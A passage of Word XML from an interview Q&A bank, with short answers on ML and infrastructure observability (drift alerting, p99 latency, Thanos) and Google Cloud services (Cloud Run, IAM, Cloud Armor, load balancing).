        <w:t>A: Observability for ML systems monitors data quality, drift, prediction distributions, model performance, latency, infrastructure, feature pipelines, and business outcomes. It combines software observability with ML-specific monitoring.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Observability For ML Systems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Q679. What is model monitoring?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Model monitoring tracks production model behavior such as accuracy, drift, bias, prediction distribution, confidence, latency, and throughput. It helps decide when to retrain, roll back, or investigate.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Model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Q680. Explain drift alerting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Drift alerting notifies teams when production data or model behavior differs significantly from training baselines. Alerts should include affected features, severity, sample windows, and recommended actions.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Drift Alerting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Q681. What is business metrics monitoring?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Business metrics monitoring tracks outcomes such as conversions, revenue, fraud loss, churn, or engagement. It ensures technical health is connected to real business impact.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Business Metrics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Q682. Explain synthetic transactions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Synthetic transactions are scripted user or API flows run regularly from controlled locations. They verify availability and core functionality independent of real user traffic.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Synthetic Transactions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Q683. What is uptime monitoring?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Uptime monitoring checks whether a service is reachable and responding successfully. It is usually implemented with external probes, health checks, and synthetic requests.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Uptime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Q684. Explain latency percentile.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A latency percentile shows the response time below which a percentage of requests complete. Percentiles reveal tail latency better than averages.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Latency Percentile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Q685. What is p99 latency?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: p99 latency is the 99th percentile response time, meaning 99 percent of requests are faster and 1 percent are slower. It is important for understanding worst-case user experience.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>P99 Latency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Q686. Explain distributed logging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Distributed logging collects logs from multiple services and correlates them using request IDs, trace IDs, service names, and timestamps. It is essential for microservice debugging.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Distributed Logging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Q687. What is telemetry data?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Telemetry data is automatically collected operational data such as metrics, logs, traces, events, profiles, and health signals. It helps understand and operate systems.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Telemetry Data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Q688. Explain event correlation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Event correlation links related alerts, logs, metrics, traces, and changes to identify patterns and likely causes. It reduces noise during incident response.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Event Correlation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Q689. What is observability maturity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Observability maturity describes how well an organization collects, uses, governs, and improves telemetry. Mature teams have SLOs, actionable alerts, tracing, ownership, runbooks, and cost control.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Observability Maturity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Q690. Explain trace sampling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Trace sampling controls which traces are stored or exported. It reduces cost while preserving useful traces, especially errors, slow requests, and representative traffic.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Trace Sampling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Q691. What is monitoring federation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Monitoring federation aggregates metrics from multiple monitoring systems or clusters. It supports centralized dashboards and alerts while allowing local collection.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Monitoring Federation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Q692. Explain long-term storage in Prometheus.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Prometheus itself is usually used for short to medium retention. Long-term storage is commonly added with systems such as Thanos, Cortex, Mimir, or remote-write backends.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Long-term Storage In Prometheus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Q693. What is Thanos?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Thanos extends Prometheus with long-term storage, global querying, deduplication, and high availability. It is commonly used for multi-cluster monitoring.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Thanos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Q694. Explain Cortex.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cortex is a horizontally scalable, multi-tenant, long-term storage system for Prometheus metrics. It supports remote write and centralized querying.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cortex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Q695. What is VictoriaMetrics?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: VictoriaMetrics is a high-performance time-series database used for metrics storage and querying. It is valued for efficient storage, speed, and scalability.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Victoriametrics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Q696. Explain observability cost optimization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Observability cost optimization controls telemetry volume through sampling, retention policies, cardinality management, log filtering, tiered storage, and ownership of dashboards and alerts.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Observability Cost Optimization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Q697. What are common monitoring failures?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Common monitoring failures include missing user-impact alerts, noisy alerts, stale dashboards, dropped telemetry, high-cardinality overload, no runbooks, and lack of ownership.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Common Monitoring Failures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Q698. Explain monitoring architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Monitoring architecture should collect telemetry from apps, infrastructure, Kubernetes, cloud services, and dependencies, then route it to storage, dashboards, alerting, and incident tools with clear ownership and retention.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Monitoring Architecture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Q699. What is proactive monitoring?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Proactive monitoring detects risk before outages occur by tracking trends, saturation, anomalies, capacity, error-budget burn, synthetic checks, and early warning indicators.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Proactive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Q700. Design an enterprise observability platform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An enterprise observability platform should standardize metrics, logs, traces, events, dashboards, alerting, SLOs, telemetry pipelines, retention, access control, and cost governance across teams. It should integrate with incident management and support Kubernetes, cloud, applications, and ML workloads.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Enterprise Observability Platform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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>GCP &amp; Cloud Engineering (541–650)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q701. What is Google Cloud Platform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Google Cloud Platform is Google’s cloud computing platform for compute, storage, networking, data analytics, AI/ML, security, and managed services. It is commonly used to build scalable applications, data platforms, and cloud-native infrastructure.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Google Cloud Platform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Q702. Explain GCP regions and zones.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: GCP regions are geographic locations, and zones are isolated locations within a region. Deploying across zones improves availability, while multi-region designs improve disaster recovery and user latency.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>GCP Regions And Zones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Q703. What is Compute Engine?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Compute Engine is GCP’s virtual machine service. It lets teams run customizable VMs with different machine types, disks, images, networks, GPUs, autoscaling, and managed instance groups.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Compute Engine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Q704. What is Cloud Run?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud Run is a fully managed serverless container platform. It runs containers that scale automatically based on requests and can scale to zero when idle.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud Run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Q705. Explain App Engine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: App Engine is a platform-as-a-service offering for deploying applications without managing servers. It supports automatic scaling, versions, traffic splitting, and managed runtimes.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>App Engine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Q706. What is Cloud Functions?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud Functions is a serverless function platform for running event-driven code. It is useful for lightweight automation triggered by HTTP, Pub/Sub, Cloud Storage, and other events.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud Functions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Q707. Explain Pub/Sub.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Pub/Sub is GCP’s managed messaging service for asynchronous event delivery. It decouples producers and consumers and supports scalable event-driven architectures.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Pub/sub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Q708. What is BigQuery?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: BigQuery is GCP’s serverless data warehouse for large-scale analytics. It supports SQL, partitioned tables, streaming ingestion, ML features, and integration with many data tools.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Bigquery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Q709. Explain Cloud Storage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud Storage is GCP’s object storage service for files, backups, data lakes, static assets, and artifacts. It supports storage classes, lifecycle policies, IAM, encryption, and versioning.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud Storage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Q710. What is Filestore?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Filestore is a managed network file storage service for applications that need shared POSIX-compatible file systems. It is useful for workloads such as content management, analytics, and Kubernetes persistent storage.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Filestore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Q711. Explain Cloud SQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud SQL is GCP’s managed relational database service for MySQL, PostgreSQL, and SQL Server. It handles backups, patching, replication, high availability, and monitoring.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud Sql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Q712. What is Spanner?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud Spanner is a globally distributed relational database with strong consistency and horizontal scaling. It is used for mission-critical workloads that need SQL, high availability, and global scale.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Spanner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Q713. Explain Firestore.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Firestore is a managed NoSQL document database for mobile, web, and server applications. It supports real-time sync, offline access, automatic scaling, and flexible document structures.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Firestore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Q714. What is Memorystore?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Memorystore is GCP’s managed in-memory data store for Redis and Memcached. It is used for caching, sessions, leaderboards, rate limiting, and low-latency data access.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Memorystore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Q715. What is Shared VPC?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Shared VPC lets multiple projects use a centrally managed network from a host project. It supports enterprise separation of duties between networking teams and application teams.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Shared VPC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Q716. Explain VPC peering.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: VPC peering privately connects two VPC networks so resources can communicate without traversing the public internet. It is useful for cross-project or cross-team private connectivity.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>VPC Peering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Q717. What is Cloud NAT?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud NAT provides outbound internet access for private resources without assigning them public IP addresses. It improves security while allowing updates, API calls, and external downloads.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud Nat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Q718. Explain Cloud Router.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud Router dynamically exchanges routes between GCP and external networks using BGP. It is commonly used with Cloud VPN and Cloud Interconnect.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud Router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Q719. What is IAM in GCP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: GCP IAM controls who can access which resources and what actions they can perform. It uses principals, roles, permissions, policies, service accounts, and conditions.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>IAM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Q720. What is Workload Identity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Workload Identity lets Kubernetes workloads access GCP services using mapped Google service accounts instead of long-lived keys. It improves security for GKE applications.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Workload Identity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Q721. Explain organization policies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Organization policies define centralized constraints across GCP resources, such as disabling public IPs, restricting regions, or preventing risky services. They enforce governance at organization, folder, or project level.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Organization Policies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Q722. What is Cloud Armor?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud Armor is GCP’s web application firewall and DDoS protection service. It protects HTTP(S) load-balanced applications using security policies, rate limiting, bot controls, and managed rules.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud Armor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Q723. Explain Identity-Aware Proxy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Identity-Aware Proxy controls access to applications based on user identity and context rather than network location. It is part of zero-trust access patterns in GCP.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Identity-aware Proxy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Q724. What is Cloud CDN?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud CDN caches content at Google edge locations to reduce latency and origin load. It is commonly used with HTTP(S) Load Balancing and Cloud Storage or backend services.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud Cdn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Q725. Explain load balancing in GCP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: GCP load balancing distributes traffic across backends using global or regional load balancers. It supports HTTP(S), TCP, UDP, internal, external, SSL proxy, and network load balancing patterns.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Load Balancing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Q726. What is Internal Load Balancer?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An Internal Load Balancer distributes private traffic inside a VPC. It is used for internal services, microservices, private APIs, and backend applications.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Internal Load Balancer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Q727. Explain External Load Balancer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An External Load Balancer exposes applications to internet or external clients. It supports global routing, TLS termination, health checks, Cloud Armor, and backend scaling.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>External Load Balancer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Q728. What is Cloud DNS?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud DNS is GCP’s managed authoritative DNS service. It provides scalable public and private DNS zones with IAM controls and integration with cloud infrastructure.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud DNS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Q729. Explain Cloud Monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud Monitoring collects metrics, dashboards, uptime checks, and alerts for GCP and hybrid environments. It is part of Google Cloud Observability.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud Monitoring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Q730. What is Cloud Logging?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud Logging collects, stores, searches, and routes logs from GCP services, applications, and infrastructure. It supports log sinks, retention, alerting, and audit analysis.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud Logging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Q731. Explain Error Reporting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Error Reporting groups and tracks application errors from logs and supported runtimes. It helps teams identify recurring failures and prioritize fixes.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Error Reporting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Q732. What is Cloud Trace?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud Trace provides distributed tracing to measure request latency across services. It helps identify bottlenecks and understand service dependencies.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud Trace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Q733. Explain Cloud Profiler.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud Profiler continuously profiles application CPU and memory usage with low overhead. It helps find performance bottlenecks and optimize code.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud Profiler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Q734. What is Anthos?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Anthos is Google Cloud’s hybrid and multi-cloud application platform built around Kubernetes, service management, policy, and configuration. It helps manage workloads across GCP, on-prem, and other clouds.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Anthos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Q735. Explain Config Connector.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
